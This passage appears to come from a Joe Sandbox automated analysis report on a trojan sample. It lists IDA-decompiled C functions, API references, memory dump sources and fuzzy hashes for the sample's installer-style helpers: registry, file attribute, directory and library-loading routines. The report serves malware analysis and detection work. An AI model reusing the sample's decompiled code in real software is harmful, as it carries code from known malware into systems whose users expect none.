                                                                                                                          • Instruction Fuzzy Hash: 5C116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 69%
                                                                                                                          			E00401389(signed int _a4, struct HWND__* _a10) {
                                                                                                                          				intOrPtr* _t6;
                                                                                                                          				void* _t8;
                                                                                                                          				void* _t10;
                                                                                                                          				signed int _t11;
                                                                                                                          				void* _t12;
                                                                                                                          				signed int _t16;
                                                                                                                          				signed int _t17;
                                                                                                                          
                                                                                                                          				_t17 = _a4;
                                                                                                                          				while(_t17 >= 0) {
                                                                                                                          					_t6 = _t17 * 0x1c +  *0x42a290;
                                                                                                                          					if( *_t6 == 1) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					_push(_t6); // executed
                                                                                                                          					_t8 = E00401434(); // executed
                                                                                                                          					if(_t8 == 0x7fffffff) {
                                                                                                                          						return 0x7fffffff;
                                                                                                                          					}
                                                                                                                          					_t10 = E0040136D(_t8);
                                                                                                                          					if(_t10 != 0) {
                                                                                                                          						_t11 = _t10 - 1;
                                                                                                                          						_t16 = _t17;
                                                                                                                          						_t17 = _t11;
                                                                                                                          						_t12 = _t11 - _t16;
                                                                                                                          					} else {
                                                                                                                          						_t12 = _t10 + 1;
                                                                                                                          						_t17 = _t17 + 1;
                                                                                                                          					}
                                                                                                                          					if(_a10 != 0) {
                                                                                                                          						 *0x42924c =  *0x42924c + _t12;
                                                                                                                          						SendMessageW(_a10, 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0); // executed
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return 0;
                                                                                                                          			}










                                                                                                                          0x0040138a
                                                                                                                          0x004013fa
                                                                                                                          0x0040139b
                                                                                                                          0x004013a0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004013a2
                                                                                                                          0x004013a3
                                                                                                                          0x004013ad
                                                                                                                          0x00000000
                                                                                                                          0x00401404
                                                                                                                          0x004013b0
                                                                                                                          0x004013b7
                                                                                                                          0x004013bd
                                                                                                                          0x004013be
                                                                                                                          0x004013c0
                                                                                                                          0x004013c2
                                                                                                                          0x004013b9
                                                                                                                          0x004013b9
                                                                                                                          0x004013ba
                                                                                                                          0x004013ba
                                                                                                                          0x004013c9
                                                                                                                          0x004013cb
                                                                                                                          0x004013f4
                                                                                                                          0x004013f4
                                                                                                                          0x004013c9
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                          • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                                                          • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                                                                                          • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                                                          • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00402434(void* __ebx) {
                                                                                                                          				long _t7;
                                                                                                                          				void* _t14;
                                                                                                                          				long _t18;
                                                                                                                          				intOrPtr _t20;
                                                                                                                          				void* _t22;
                                                                                                                          				void* _t23;
                                                                                                                          
                                                                                                                          				_t14 = __ebx;
                                                                                                                          				_t26 =  *(_t23 - 0x20) - __ebx;
                                                                                                                          				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
                                                                                                                          				if( *(_t23 - 0x20) != __ebx) {
                                                                                                                          					_t7 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1); // executed
                                                                                                                          					_t18 = _t7;
                                                                                                                          					goto L4;
                                                                                                                          				} else {
                                                                                                                          					_t22 = E00402DE6(_t26, 2);
                                                                                                                          					if(_t22 == __ebx) {
                                                                                                                          						L6:
                                                                                                                          						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                                                                                          					} else {
                                                                                                                          						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
                                                                                                                          						RegCloseKey(_t22);
                                                                                                                          						L4:
                                                                                                                          						if(_t18 != _t14) {
                                                                                                                          							goto L6;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t23 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}









                                                                                                                          0x00402434
                                                                                                                          0x00402434
                                                                                                                          0x00402437
                                                                                                                          0x0040243a
                                                                                                                          0x00402476
                                                                                                                          0x0040247b
                                                                                                                          0x00000000
                                                                                                                          0x0040243c
                                                                                                                          0x00402443
                                                                                                                          0x00402447
                                                                                                                          0x0040292e
                                                                                                                          0x0040292e
                                                                                                                          0x0040244d
                                                                                                                          0x0040245d
                                                                                                                          0x0040245f
                                                                                                                          0x0040247d
                                                                                                                          0x0040247f
                                                                                                                          0x00000000
                                                                                                                          0x00402485
                                                                                                                          0x0040247f
                                                                                                                          0x00402447
                                                                                                                          0x00402c2d
                                                                                                                          0x00402c39

                                                                                                                          APIs
                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseDeleteValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2831762973-0
                                                                                                                          • Opcode ID: fa7497d2a55c6aee17a6e8966368ea5c14482efd952b72f56de5eff916e8742b
                                                                                                                          • Instruction ID: 27a137a867c600d8965633a271772258b7302ea9b92edfc7e4bdeed26dcbc29b
                                                                                                                          • Opcode Fuzzy Hash: fa7497d2a55c6aee17a6e8966368ea5c14482efd952b72f56de5eff916e8742b
                                                                                                                          • Instruction Fuzzy Hash: 54F06272A04120EBDB11ABB89B4DAAD72A9AF44354F15443BE141B71C0DAFC5D05866E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$EnableShow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1136574915-0
                                                                                                                          • Opcode ID: 95afd0b3e96225690878e74426fe6249c0101c6a0e7d768803b2c4d7a80ee517
                                                                                                                          • Instruction ID: 74d914ea4967392a65d1c9fdd8f91c6329c2dde8704c14122971abf6b6e16597
                                                                                                                          • Opcode Fuzzy Hash: 95afd0b3e96225690878e74426fe6249c0101c6a0e7d768803b2c4d7a80ee517
                                                                                                                          • Instruction Fuzzy Hash: 14E0D872908201CFE705EBA4EE485AD73F0EF40315710097FE401F11D0DBB54C00862D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00406A35(signed int _a4) {
                                                                                                                          				struct HINSTANCE__* _t5;
                                                                                                                          				signed int _t10;
                                                                                                                          
                                                                                                                          				_t10 = _a4 << 3;
                                                                                                                          				_t8 =  *(_t10 + 0x40a410);
                                                                                                                          				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                                                                                                          				if(_t5 != 0) {
                                                                                                                          					L2:
                                                                                                                          					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                                                                                                          				}
                                                                                                                          				_t5 = E004069C5(_t8); // executed
                                                                                                                          				if(_t5 == 0) {
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				goto L2;
                                                                                                                          			}





                                                                                                                          0x00406a3d
                                                                                                                          0x00406a40
                                                                                                                          0x00406a47
                                                                                                                          0x00406a4f
                                                                                                                          0x00406a5b
                                                                                                                          0x00000000
                                                                                                                          0x00406a62
                                                                                                                          0x00406a52
                                                                                                                          0x00406a59
                                                                                                                          0x00000000
                                                                                                                          0x00406a6a
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                                                            • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                                                            • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                                                                            • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2547128583-0
                                                                                                                          • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                                                          • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                                                                                          • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                                                          • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00406158(WCHAR* _a4, long _a8, long _a12) {
                                                                                                                          				signed int _t5;
                                                                                                                          				void* _t6;
                                                                                                                          
                                                                                                                          				_t5 = GetFileAttributesW(_a4); // executed
                                                                                                                          				asm("sbb ecx, ecx");
                                                                                                                          				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                                                          				return _t6;
                                                                                                                          			}





                                                                                                                          0x0040615c
                                                                                                                          0x00406169
                                                                                                                          0x0040617e
                                                                                                                          0x00406184

                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe,80000000,00000003), ref: 0040615C
                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 415043291-0
                                                                                                                          • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                                                          • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                                                                                          • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                                                          • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00406133(WCHAR* _a4) {
                                                                                                                          				signed char _t3;
                                                                                                                          				signed char _t7;
                                                                                                                          
                                                                                                                          				_t3 = GetFileAttributesW(_a4); // executed
                                                                                                                          				_t7 = _t3;
                                                                                                                          				if(_t7 != 0xffffffff) {
                                                                                                                          					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                                                                                          				}
                                                                                                                          				return _t7;
                                                                                                                          			}





                                                                                                                          0x00406138
                                                                                                                          0x0040613e
                                                                                                                          0x00406143
                                                                                                                          0x0040614c
                                                                                                                          0x0040614c
                                                                                                                          0x00406155

                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040614C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                          • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                                                                                          • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                          • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405C16(WCHAR* _a4) {
                                                                                                                          				int _t2;
                                                                                                                          
                                                                                                                          				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                                                                          				if(_t2 == 0) {
                                                                                                                          					return GetLastError();
                                                                                                                          				}
                                                                                                                          				return 0;
                                                                                                                          			}




                                                                                                                          0x00405c1c
                                                                                                                          0x00405c24
                                                                                                                          0x00000000
                                                                                                                          0x00405c2a
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                                                          • GetLastError.KERNEL32 ref: 00405C2A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1375471231-0
                                                                                                                          • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                                                          • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                                                                                          • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                                                          • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: EnumWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1129996299-0
                                                                                                                          • Opcode ID: 48ca36a191c6661b9e18e16cf921067244e0abbc616e7fab8e463ca52678778f
                                                                                                                          • Instruction ID: 7fafab7397e9f67fda7ebbb82efc9ef41a8c0a32ed272f5bc1742b85e31fe018
                                                                                                                          • Opcode Fuzzy Hash: 48ca36a191c6661b9e18e16cf921067244e0abbc616e7fab8e463ca52678778f
                                                                                                                          • Instruction Fuzzy Hash: 97F02777A08398DBDF79CF20C8286D97B38AF05700F484849C9049F710C7340A819388
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004023B2(int __eax, WCHAR* __ebx) {
                                                                                                                          				WCHAR* _t11;
                                                                                                                          				WCHAR* _t13;
                                                                                                                          				void* _t17;
                                                                                                                          				int _t21;
                                                                                                                          
                                                                                                                          				_t11 = __ebx;
                                                                                                                          				_t5 = __eax;
                                                                                                                          				_t13 = 0;
                                                                                                                          				if(__eax != __ebx) {
                                                                                                                          					__eax = E00402DA6(__ebx);
                                                                                                                          				}
                                                                                                                          				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
                                                                                                                          					_t13 = E00402DA6(0x11);
                                                                                                                          				}
                                                                                                                          				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
                                                                                                                          					_t11 = E00402DA6(0x22);
                                                                                                                          				}
                                                                                                                          				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
                                                                                                                          				_t21 = _t5;
                                                                                                                          				if(_t21 == 0) {
                                                                                                                          					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                                                                          				}
                                                                                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t17 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}







                                                                                                                          0x004023b2
                                                                                                                          0x004023b2
                                                                                                                          0x004023b4
                                                                                                                          0x004023b8
                                                                                                                          0x004023bb
                                                                                                                          0x004023c0
                                                                                                                          0x004023c5
                                                                                                                          0x004023ce
                                                                                                                          0x004023ce
                                                                                                                          0x004023d3
                                                                                                                          0x004023dc
                                                                                                                          0x004023dc
                                                                                                                          0x004023e9
                                                                                                                          0x004015b4
                                                                                                                          0x004015b6
                                                                                                                          0x0040292e
                                                                                                                          0x0040292e
                                                                                                                          0x00402c2d
                                                                                                                          0x00402c39

                                                                                                                          APIs
                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 390214022-0
                                                                                                                          • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                                                          • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                                                                          • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                                                          • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00406503(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                                                          				void* _t7;
                                                                                                                          				long _t8;
                                                                                                                          				void* _t9;
                                                                                                                          
                                                                                                                          				_t7 = E00406454(_a4,  &_a12);
                                                                                                                          				if(_t7 != 0) {
                                                                                                                          					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                                                                                          					return _t8;
                                                                                                                          				}
                                                                                                                          				_t9 = 6;
                                                                                                                          				return _t9;
                                                                                                                          			}






                                                                                                                          0x0040650d
                                                                                                                          0x00406516
                                                                                                                          0x0040652c
                                                                                                                          0x00000000
                                                                                                                          0x0040652c
                                                                                                                          0x0040651a
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 0040652C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Create
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2289755597-0
